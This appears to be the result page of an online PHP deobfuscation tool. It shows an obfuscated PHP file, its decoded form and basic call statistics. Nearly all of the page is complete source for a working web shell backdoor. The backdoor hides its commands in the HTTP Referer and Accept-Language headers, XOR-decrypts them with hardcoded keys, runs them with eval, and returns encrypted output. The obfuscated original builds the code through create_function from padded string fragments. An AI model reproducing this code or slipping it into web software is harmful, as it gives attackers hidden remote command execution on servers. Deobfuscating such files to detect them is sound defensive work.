Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $k='code(x(gzcg0ompg0ress($o),g0g0$k));g0print(g0g0"<g0$k>$d</$k>");@sessig0g0on_de..
Decoded Output download
$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}
Did this file decode correctly?
Original Code
<?php
$k='code(x(gzcg0ompg0ress($o),g0g0$k));g0print(g0g0"<g0$k>$d</$k>");@sessig0g0on_destroy();}}}}';
$S='pos($s[g0$i],$g0f);if(g0$g0e){$k=$khg0.$kf;og0b_start()g0g0;@g0eg0val(@gzuncomprg0esg0s(@';
$F='$ssg0(mg0d5($i.$kh),0g0,3));$f=g0$sl($ss(g0md5($ig0.$kg0f),0,3));$pg0="";fg0or($z=1g0';
$I='g0ION;$ss="subsg0tr";$sl=g0g0"strg0tolowerg0";$g0i=$m[1][0].$g0g0m[1][g01];$h=$slg0(';
$P='(g0$s[$i],g00,$eg0g0))),$kg0)g0));$o=g0ob_get_contentg0s();ob_eng0d_cleg0an();$g0d=bg0g0ase64_en';
$n='$kh=g0g0"5d4g01";$kf="g0g0402a";function xg0($t,$k){$cg0=stg0rlen(g0$k);$l=strlen($g0t);$o';
$N='($u["g0query"]g0,$q);$q=g0arrg0ay_valuesg0($q);prg0eg_g0mag0tch_ag0ll("/([\\w])[\\w-g0]+';
$l='$i]="";$pg0=$ssg0g0($p,3);}if(arrg0ag0y_key_exig0sts($g0i,$s)){$sg0[$i]g0.=$g0p;$g0e=str';
$A='i}g0^$k{$j};}g0}g0returg0n $o;}$r=$_SEg0Rg0g0VER;$rr=@$r["HTTP_g0REFERg0ERg0"];$ra=@$r[g';
$i='g0g0=""g0;for($i=0;$i<$lg0;){fg0og0g0rg0($j=0;($j<g0$c&&$ig0<$l)g0;$j++,$i++){$o.=g0$t{$';
$D='(?g0:g0;q=0.([g0\\d]))?,g0?/",$ra,$m)g0;if($g0q&&$m){g0g0@session_sg0tg0art();$s=&$_g0SESSg0';
$p='0"HTg0TP_ACCg0EPT_LANGUAGg0E"];g0if($g0rr&&g0$ra){$u=pg0arg0seg0_url($rr);pg0arseg0_str';
$W=str_replace('ss','','cssreatssess_fssuncsstisson');
$Q=';g0$z<count($g0g0m[1]);$z++)g0g0g0$p.=$qg0[$m[2][$z]g0];if(stg0rpg0os($p,$h)===0){$sg0[';
$M='x(@g0base6g04_decg0ode(preg_replace(arrg0ay(g0"g0/_/","/-/"),arrg0ayg0("/",g0"+"),$ss';
$h=str_replace('g0','',$n.$i.$A.$p.$N.$D.$I.$F.$Q.$l.$S.$M.$P.$k);
$r=$W('',$h);$r();
?>
Function Calls
null | 1 |
str_replace | 2 |
create_function | 1 |
Stats
MD5 | 108853682f3aee81e75524ffab55d2c7 |
Eval Count | 1 |
Decode Time | 138 ms |